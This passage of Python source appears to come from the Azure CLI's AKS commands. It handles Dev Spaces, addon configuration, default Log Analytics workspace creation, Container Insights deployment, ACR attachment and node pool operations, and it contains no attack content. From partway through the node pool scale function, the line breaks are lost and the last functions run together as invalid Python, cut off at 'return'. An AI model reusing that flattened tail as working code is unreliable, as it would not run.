    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param update: Update to the latest Azure Dev Spaces client components.
    :type update: bool
    :param space_name: Name of the new or existing dev space to select. Defaults to an \
    interactive selection experience.
    :type space_name: String
    :param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
    See https://aka.ms/azds-networking for more information.
    :type endpoint_type: String
    :param prompt: Do not prompt for confirmation. Requires --space.
    :type prompt: bool
    """
    if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
        azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
        try:
            azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
        except TypeError:
            raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
        except AttributeError as ae:
            raise CLIError(ae)


def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
    """
    Remove Azure Dev Spaces from a managed Kubernetes cluster.

    :param name: Name of the managed cluster.
    :type name: String
    :param resource_group_name: Name of resource group. You can configure the default group. \
    Using 'az configure --defaults group=<name>'.
    :type resource_group_name: String
    :param prompt: Do not prompt for confirmation.
    :type prompt: bool
    """
    if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
        azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
        try:
            azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
        except AttributeError as ae:
            raise CLIError(ae)


def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
    """Rotate the cluster's certificates; fire-and-forget by default (no_wait=True)."""
    return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)


def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
                   workspace_resource_id=None,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   enable_sgxquotehelper=False,
                   no_wait=False):
    """Enable or disable the comma-separated *addons* on *instance* and return it.

    Raises CLIError for unknown addon names or for enabling an addon that is
    already enabled. Monitoring, virtual-node, ingress-appgw and confcom get
    addon-specific config handling.
    """
    # parse the comma-separated addons argument
    addon_args = addons.split(',')

    addon_profiles = instance.addon_profiles or {}

    os_type = 'Linux'

    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type

        # honor addon names defined in Azure CLI
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)

        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                if not workspace_resource_id:
                    workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                        cmd, subscription_id, resource_group_name)

                workspace_resource_id = workspace_resource_id.strip()
                if not workspace_resource_id.startswith('/'):
                    workspace_resource_id = '/' + workspace_resource_id
                if workspace_resource_id.endswith('/'):
                    workspace_resource_id = workspace_resource_id.rstrip('/')
                addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError('The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_cidr is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
                    raise ValidationError('The confcom addon is already enabled for this managed cluster.',
                                          recommendation='To change confcom configuration, run '
                                          f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                          'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
                if enable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
            addon_profiles[addon] = addon_profile
        else:
            if addon not in addon_profiles:
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
                else:
                    raise CLIError("The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable

    instance.addon_profiles = addon_profiles

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return instance


def _get_azext_module(extension_name, module_name):
    """Import and return *module_name* from the installed *extension_name* CLI extension."""
    try:
        # Adding the installed extension in the path
        from azure.cli.core.extension.operations import add_extension_to_path
        add_extension_to_path(extension_name)
        # Import the extension module
        from importlib import import_module
        azext_custom = \
            import_module(module_name)
        return azext_custom
    except ImportError as ie:
        raise CLIError(ie)


def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
                        workspace_resource_id=None,
                        aci_subnet_name=None,
                        vnet_subnet_id=None,
                        appgw_name=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        enable_sgxquotehelper=False):
    """Translate the --enable-addons string into ManagedClusterAddonProfile entries.

    Returns the updated addon_profiles dict; raises CLIError for unrecognized
    addon names or missing addon-specific required arguments.
    """
    if not addon_profiles:
        addon_profiles = {}

    addons = addons_str.split(',') if addons_str else []

    if 'http_application_routing' in addons:
        addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('http_application_routing')

    if 'kube-dashboard' in addons:
        addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('kube-dashboard')

    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)

        workspace_resource_id = workspace_resource_id.strip()
        if not workspace_resource_id.startswith('/'):
            workspace_resource_id = '/' + workspace_resource_id
        if workspace_resource_id.endswith('/'):
            workspace_resource_id = workspace_resource_id.rstrip('/')
        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
        addons.remove('monitoring')
    # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
    elif workspace_resource_id:
        raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
    if 'azure-policy' in addons:
        addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('azure-policy')
    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        os_type = 'Linux'
        addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
            enabled=True,
            config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
        )
        addons.remove('virtual-node')
    if 'ingress-appgw' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        if appgw_name is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
        if appgw_subnet_cidr is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
        if appgw_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
        if appgw_subnet_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
        if appgw_watch_namespace is not None:
            addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
        addons.remove('ingress-appgw')
    if 'confcom' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
        if enable_sgxquotehelper:
            addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
        addons.remove('confcom')
    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles


def _install_dev_spaces_extension(cmd, extension_name):
    """Best-effort install of the Dev Spaces CLI extension; returns success as bool."""
    try:
        from azure.cli.core.extension import operations
        operations.add_extension(cmd=cmd, extension_name=extension_name)
    except Exception:  # nopa pylint: disable=broad-except
        return False
    return True


def _update_dev_spaces_extension(cmd, extension_name, extension_module):
    """Update and reload the Dev Spaces CLI extension; returns success as bool."""
    from azure.cli.core.extension import ExtensionNotInstalledException
    try:
        from azure.cli.core.extension import operations
        operations.update_extension(cmd=cmd, extension_name=extension_name)
        operations.reload_extension(extension_name=extension_name)
    except CLIError as err:
        logger.info(err)
    except ExtensionNotInstalledException as err:
        logger.debug(err)
        return False
    except ModuleNotFoundError as err:
        logger.debug(err)
        logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
        return False
    return True


def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
    """Ensure the extension is installed (optionally updated); returns success as bool."""
    from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
    try:
        get_extension(extension_name)
        if update:
            return _update_dev_spaces_extension(cmd, extension_name, extension_module)
    except ExtensionNotInstalledException:
        return _install_dev_spaces_extension(cmd, extension_name)
    return True


def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
    """Return the resource ID of the default Log Analytics workspace for the
    resource group's region, creating the workspace (and its default resource
    group) when it does not exist yet.
    """
    # mapping for azure public cloud
    # log analytics workspaces cannot be created in WCUS region due to capacity limits
    # so mapped to EUS per discussion with log analytics team
    AzureCloudLocationToOmsRegionCodeMap = {
        "australiasoutheast": "ASE",
        "australiaeast": "EAU",
        "australiacentral": "CAU",
        "canadacentral": "CCA",
        "centralindia": "CIN",
        "centralus": "CUS",
        "eastasia": "EA",
        "eastus": "EUS",
        "eastus2": "EUS2",
        "eastus2euap": "EAP",
        "francecentral": "PAR",
        "japaneast": "EJP",
        "koreacentral": "SE",
        "northeurope": "NEU",
        "southcentralus": "SCUS",
        "southeastasia": "SEA",
        "uksouth": "SUK",
        "usgovvirginia": "USGV",
        "westcentralus": "EUS",
        "westeurope": "WEU",
        "westus": "WUS",
        "westus2": "WUS2",
        "brazilsouth": "CQ",
        "brazilsoutheast": "BRSE",
        "norwayeast": "NOE",
        "southafricanorth": "JNB",
        "northcentralus": "NCUS",
        "uaenorth": "DXB",
        "germanywestcentral": "DEWC",
        "ukwest": "WUK",
        "switzerlandnorth": "CHN",
        "switzerlandwest": "CHW",
        "uaecentral": "AUH"
    }
    AzureCloudRegionToOmsRegionMap = {
        "australiacentral": "australiacentral",
        "australiacentral2": "australiacentral",
        "australiaeast": "australiaeast",
        "australiasoutheast": "australiasoutheast",
        "brazilsouth": "brazilsouth",
        "canadacentral": "canadacentral",
        "canadaeast": "canadacentral",
        "centralus": "centralus",
        "centralindia": "centralindia",
        "eastasia": "eastasia",
        "eastus": "eastus",
        "eastus2": "eastus2",
        "francecentral": "francecentral",
        "francesouth": "francecentral",
        "japaneast": "japaneast",
        "japanwest": "japaneast",
        "koreacentral": "koreacentral",
        "koreasouth": "koreacentral",
        "northcentralus": "northcentralus",
        "northeurope": "northeurope",
        "southafricanorth": "southafricanorth",
        "southafricawest": "southafricanorth",
        "southcentralus": "southcentralus",
        "southeastasia": "southeastasia",
        "southindia": "centralindia",
        "uksouth": "uksouth",
        "ukwest": "ukwest",
        "westcentralus": "eastus",
        "westeurope": "westeurope",
        "westindia": "centralindia",
        "westus": "westus",
        "westus2": "westus2",
        "norwayeast": "norwayeast",
        "norwaywest": "norwayeast",
        "switzerlandnorth": "switzerlandnorth",
        "switzerlandwest": "switzerlandwest",
        "uaenorth": "uaenorth",
        "germanywestcentral": "germanywestcentral",
        "germanynorth": "germanywestcentral",
        "uaecentral": "uaecentral",
        "eastus2euap": "eastus2euap",
        "brazilsoutheast": "brazilsoutheast"
    }

    # mapping for azure china cloud
    # currently log analytics supported only China East 2 region
    AzureChinaLocationToOmsRegionCodeMap = {
        "chinaeast": "EAST2",
        "chinaeast2": "EAST2",
        "chinanorth": "EAST2",
        "chinanorth2": "EAST2"
    }
    AzureChinaRegionToOmsRegionMap = {
        "chinaeast": "chinaeast2",
        "chinaeast2": "chinaeast2",
        "chinanorth": "chinaeast2",
        "chinanorth2": "chinaeast2"
    }

    # mapping for azure us governmner cloud
    AzureFairfaxLocationToOmsRegionCodeMap = {
        "usgovvirginia": "USGV",
        "usgovarizona": "PHX"
    }
    AzureFairfaxRegionToOmsRegionMap = {
        "usgovvirginia": "usgovvirginia",
        "usgovtexas": "usgovvirginia",
        "usgovarizona": "usgovarizona"
    }

    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    cloud_name = cmd.cli_ctx.cloud.name
    workspace_region = "eastus"
    workspace_region_code = "EUS"

    # sanity check that locations and clouds match.
    if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))

    if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))

    if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))

    if cloud_name.lower() == 'azurecloud':
        workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
        workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
    elif cloud_name.lower() == 'azurechinacloud':
        workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
        workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
    elif cloud_name.lower() == 'azureusgovernment':
        workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
        workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
    else:
        workspace_region = rg_location
        workspace_region_code = rg_location.upper()

    default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
    default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)

    default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
        '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
    resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
    resources = cf_resources(cmd.cli_ctx, subscription_id)

    # check if default RG exists
    if resource_groups.check_existence(default_workspace_resource_group):
        try:
            resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
            return resource.id
        except CloudError as ex:
            # 404 means "workspace missing" -> fall through and create it below
            if ex.status_code != 404:
                raise ex
    else:
        resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})

    default_workspace_params = {
        'location': workspace_region,
        'properties': {
            'sku': {
                'name': 'standalone'
            }
        }
    }
    async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
                                                    default_workspace_params)

    ws_resource_id = ''
    while True:
        result = async_poller.result(15)
        if async_poller.done():
            ws_resource_id = result.id
            break

    return ws_resource_id


def _ensure_container_insights_for_monitoring(cmd, addon):
    """Deploy the ContainerInsights solution into the monitoring addon's Log Analytics workspace."""
    # Workaround for this addon key which has been seen lowercased in the wild.
    for key in list(addon.config):
        if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
                key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
            addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key)

    workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]

    workspace_resource_id = workspace_resource_id.strip()

    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id

    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')

    # extract subscription ID and resource group from workspace_resource_id URL
    try:
        subscription_id = workspace_resource_id.split('/')[2]
        resource_group = workspace_resource_id.split('/')[4]
    except IndexError:
        raise CLIError('Could not locate resource group in workspace-resource-id URL.')

    # region of workspace can be different from region of RG so find the location of the workspace_resource_id
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    try:
        resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
        location = resource.location
    except CloudError as ex:
        raise ex

    # millisecond timestamp keeps deployment names unique per invocation
    unix_time_in_millis = int(
        (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)

    solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)

    # pylint: disable=line-too-long
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "workspaceResourceId": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics Resource ID"
                }
            },
            "workspaceRegion": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics workspace region"
                }
            },
            "solutionDeploymentName": {
                "type": "string",
                "metadata": {
                    "description": "Name of the solution deployment"
                }
            }
        },
        "resources": [
            {
                "type": "Microsoft.Resources/deployments",
                "name": "[parameters('solutionDeploymentName')]",
                "apiVersion": "2017-05-10",
                "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
                "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
                "properties": {
                    "mode": "Incremental",
                    "template": {
                        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                        "contentVersion": "1.0.0.0",
                        "parameters": {},
                        "variables": {},
                        "resources": [
                            {
                                "apiVersion": "2015-11-01-preview",
                                "type": "Microsoft.OperationsManagement/solutions",
                                "location": "[parameters('workspaceRegion')]",
                                "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                "properties": {
                                    "workspaceResourceId": "[parameters('workspaceResourceId')]"
                                },
                                "plan": {
                                    "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                    "product": "[Concat('OMSGallery/', 'ContainerInsights')]",
                                    "promotionCode": "",
                                    "publisher": "Microsoft"
                                }
                            }
                        ]
                    },
                    "parameters": {}
                }
            }
        ]
    }

    params = {
        "workspaceResourceId": {
            "value": workspace_resource_id
        },
        "workspaceRegion": {
            "value": location
        },
        "solutionDeploymentName": {
            "value": solution_deployment_name
        }
    }

    deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
    # publish the Container Insights solution to the Log Analytics workspace
    return _invoke_deployment(cmd, resource_group, deployment_name, template, params, validate=False, no_wait=False,
                              subscription_id=subscription_id)


def _ensure_aks_acr(cli_ctx, client_id, acr_name_or_id, subscription_id, detach=False):
    """Grant (or, when detach=True, revoke) the cluster identity *client_id*
    a role assignment on the ACR given by name or full resource ID.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    # Check if the ACR exists by resource ID.
    if is_valid_resource_id(acr_name_or_id):
        try:
            parsed_registry = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
            registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
        _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
        return

    # Check if the ACR exists by name accross all resource groups.
    registry_name = acr_name_or_id
    registry_resource = 'Microsoft.ContainerRegistry/registries'
    try:
        registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
    except CloudError as ex:
        if 'was not found' in ex.message:
            raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
        raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
    return


def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Return a single node pool of the managed cluster."""
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    return instance


def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
    """List all node pools of the managed cluster."""
    return client.list(resource_group_name, cluster_name)


def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
                      kubernetes_version=None,
                      zones=None,
                      enable_node_public_ip=False,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type="Linux",
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      tags=None,
                      labels=None,
                      max_surge=None,
                      mode="User",
                      no_wait=False):
    """Add a new VirtualMachineScaleSets node pool to an existing managed cluster.

    Raises CLIError when a pool with the same name already exists or a taint
    cannot be parsed.
    """
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))

    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []

    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            except ValueError:
                raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')

    # default VM size depends on the pool's OS
    if node_vm_size is None:
        if os_type.lower() == "windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"

    if max_surge:
        upgradeSettings.max_surge = max_surge

    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        vnet_subnet_id=vnet_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=zones,
        scale_set_priority=priority,
        enable_node_public_ip=enable_node_public_ip,
        node_taints=taints_array,
        upgrade_settings=upgradeSettings,
        mode=mode
    )

    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        # NaN sentinel means "no cap"; the service expects -1 for that.
        if isnan(spot_max_price):
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price

    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)

    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)

    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type

    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)


def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Scale a node pool to *node_count* nodes; refuses autoscaler-managed pools."""
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    new_node_count = int(node_count)
    if instance.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if new_node_count == instance.count:
        raise \
CLIError("The new node count is the same as the current node count.") instance.count = new_node_count # pylint: disable=no-member return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance) def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name, nodepool_name, kubernetes_version='', node_image_only=False, max_surge=None, no_wait=False): if kubernetes_version != '' and node_image_only: raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.' 'If you only want to upgrade the node version please use the "--node-image-only" option only.') if node_image_only: managed_cluster_client = cf_managed_clusters(cmd.cli_ctx) return _upgrade_single_nodepool_image_version(no_wait, managed_cluster_client, resource_group_name, cluster_name, nodepool_name) instance = client.get(resource_group_name, cluster_name, nodepool_name) instance.orchestrator_version = kubernetes_version if not instance.upgrade_settings: instance.upgrade_settings = AgentPoolUpgradeSettings() if max_surge: instance.upgrade_settings.max_surge = max_surge return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance) def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name, enable_cluster_autoscaler=False, disable_cluster_autoscaler=False, update_cluster_autoscaler=False, min_count=None, max_count=None, tags=None, max_surge=None, mode=None, no_wait=False): update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler if update_autoscaler > 1: raise CLIError('Please specify one of "--enable-cluster-autoscaler" or ' '"--disable-cluster-autoscaler" or ' '"--update-cluster-autoscaler"') if (update_autoscaler == 0 and not tags and not mode and not max_surge): raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or ' '"--disable-cluster-autoscaler" or ' 
'"--update-cluster-autoscaler" or ' '"--tags" or "--mode" or "--max-surge"') instance = client.get(resource_group_name, cluster_name, nodepool_name) _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or update_cluster_autoscaler) if enable_cluster_autoscaler: if instance.enable_auto_scaling: logger.warning('Autoscaler is already enabled for this node pool.\n' 'Please run "az aks nodepool update --update-cluster-autoscaler" ' 'if you want to update min-count or max-count.') return None instance.min_count = int(min_count) instance.max_count = int(max_count) instance.enable_auto_scaling = True if update_cluster_autoscaler: if not instance.enable_auto_scaling: raise CLIError('Autoscaler is not enabled for this node pool.\n' 'Run "az aks nodepool update --enable-cluster-autoscaler" ' 'to enable cluster with min-count and max-count.') instance.min_count = int(min_count) instance.max_count = int(max_count) if not instance.upgrade_settings: instance.upgrade_settings = AgentPoolUpgradeSettings() if max_surge: instance.upgrade_settings.max_surge = max_surge if disable_cluster_autoscaler: if not instance.enable_auto_scaling: logger.warning('Autoscaler is already disabled for this node pool.') return None instance.enable_auto_scaling = False instance.min_count = None instance.max_count = None instance.tags = tags if mode is not None: instance.mode = mode return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance) def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name, nodepool_name, no_wait=False): agentpool_exists = False instances = client.list(resource_group_name, cluster_name) for agentpool_profile in instances: if agentpool_profile.name.lower() == nodepool_name.lower(): agentpool_exists = True break if not agentpool_exists: raise CLIError("Node pool {} doesnt exist, " "use 'aks nodepool list' to get current node pool list".format(nodepool_name)) return 
